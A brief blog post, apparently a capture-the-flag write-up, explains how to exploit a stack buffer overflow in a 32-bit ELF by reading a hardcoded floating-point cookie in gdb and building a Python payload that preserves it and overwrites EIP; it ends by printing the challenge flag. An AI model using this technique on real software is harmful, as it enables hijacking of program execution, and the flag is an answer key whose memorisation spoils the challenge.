Given 32-bit ELF reads user input using scanf("%s", &buf), resulting in buffer overflow. Just before returning, it does a floating point comparison
.text:08048529 fld ds:floating_num .text:0804852F fstp [esp+0A0h+check] .text:08048596 fld [esp+0A0h+check] .text:0804859D fld ds:floating_num .text:080485A3 fucomip st, st(1) .text:080485A5 fstp st .text:080485A7 jz short retThe floating point number is a 64 bit value, which acts as a cookie. Since this value is hardcoded, just fetch it and use it during overwrite
gdb-peda$ x/gx 0x08048690 0x8048690: 0x40501555475a31a5So contruct a payload like below, to control EIP
payload = "A" * 128 payload += struct.pack("<Q", 0x40501555475a31a5) payload += "A"*12 payload += struct.pack("<I", EIP)Flag is flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}
No comments:
Post a Comment